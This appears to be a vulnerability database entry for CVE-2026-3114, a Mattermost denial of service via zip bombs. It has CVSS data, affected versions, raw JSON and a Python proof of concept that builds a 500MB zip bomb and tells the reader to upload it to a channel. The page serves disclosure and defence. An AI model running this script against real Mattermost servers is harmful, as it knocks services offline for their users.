Security Vulnerability Report
CVE-2026-3114 CVSS 6.5 MEDIUM

CVE-2026-3114

Published: 2026-03-26 17:16:42
Last Modified: 2026-03-30 19:40:46

Description

Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to validate decompressed archive entry sizes during file extraction, which allows authenticated users with file upload permissions to cause a denial of service via crafted zip archives containing highly compressed entries (zip bombs) that exhaust server memory. Mattermost Advisory ID: MMSA-2026-00598

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (versionStartIncluding 10.11.0, versionEndExcluding 10.11.12) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (versionStartIncluding 11.2.0, versionEndExcluding 11.2.4) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:* (versionStartIncluding 11.3.0, versionEndExcluding 11.3.2) - VULNERABLE
cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:* - VULNERABLE
Mattermost 11.4.x <= 11.4.0
Mattermost 11.3.x <= 11.3.1
Mattermost 11.2.x <= 11.2.3
Mattermost 10.11.x <= 10.11.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import zipfile
import io

# PoC for CVE-2026-3114: Mattermost Zip Bomb DoS
# This script generates a zip file containing a highly compressed entry.
# When uploaded to a vulnerable Mattermost instance, it will attempt to decompress
# the massive content, exhausting server memory.

def create_zip_bomb(filename, uncompressed_size_mb=100):
    # Create a buffer to hold the zip file in memory
    zip_buffer = io.BytesIO()
    try:
        with zipfile.ZipFile(zip_buffer, 'w', zipfile.ZIP_DEFLATED) as zf:
            # Create a file with repeating bytes that compresses very well
            # e.g., 100MB of null bytes compresses to a few KB
            print(f"Generating bomb payload: {uncompressed_size_mb}MB...")
            payload = b'\x00' * (1024 * 1024)  # 1MB chunk
            # Write the chunk multiple times into a single zip entry.
            # (Calling writestr() repeatedly with the same name would instead
            # produce many duplicate 1MB entries, not one large entry.)
            with zf.open("bomb_payload.txt", 'w') as entry:
                for _ in range(uncompressed_size_mb):
                    entry.write(payload)
        # Write the buffer to a file
        with open(filename, 'wb') as f:
            f.write(zip_buffer.getvalue())
        print(f"Successfully created '{filename}'.")
        print("Upload this file to a Mattermost channel to trigger the DoS.")
    except Exception as e:
        print(f"Error creating zip bomb: {e}")

if __name__ == "__main__":
    # Adjust the size (in MB) as needed to target available memory
    create_zip_bomb("cve_2026_3114_poc.zip", uncompressed_size_mb=500)

References

https://mattermost.com/security-updates (Vendor Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-3114",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-26T17:16:42.480",
    "lastModified": "2026-03-30T19:40:45.843",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Mattermost versions 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 fail to validate decompressed archive entry sizes during file extraction which allows authenticated users with file upload permissions to cause a denial of service via crafted zip archives containing highly compressed entries (zip bombs) that exhaust server memory.. Mattermost Advisory ID: MMSA-2026-00598"
      },
      {
        "lang": "es",
        "value": "Las versiones de Mattermost 11.4.x <= 11.4.0, 11.3.x <= 11.3.1, 11.2.x <= 11.2.3, 10.11.x <= 10.11.11 no validan los tamaños de las entradas de archivo descomprimidas durante la extracción de archivos, lo que permite a usuarios autenticados con permisos de carga de archivos causar una denegación de servicio mediante archivos zip manipulados que contienen entradas altamente comprimidas (bombas zip) que agotan la memoria del servidor. ID de aviso de Mattermost: MMSA-2026-00598"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-409"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "10.11.0",
                "versionEndExcluding": "10.11.12",
                "matchCriteriaId": "D144BD1D-F65C-498D-BC8A-F3D718F47F4B"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.2.0",
                "versionEndExcluding": "11.2.4",
                "matchCriteriaId": "2E3E9B61-F003-45E4-9A04-8015A5CB8558"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.3.0",
                "versionEndExcluding": "11.3.2",
                "matchCriteriaId": "805ECFFC-82FD-4754-AF95-32167E1D41CB"
              },
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:mattermost:mattermost_server:11.4.0:*:*:*:*:*:*:*",
                "matchCriteriaId": "7B6A1FE2-D980-4755-A838-190A53A4D62B"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://mattermost.com/security-updates",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}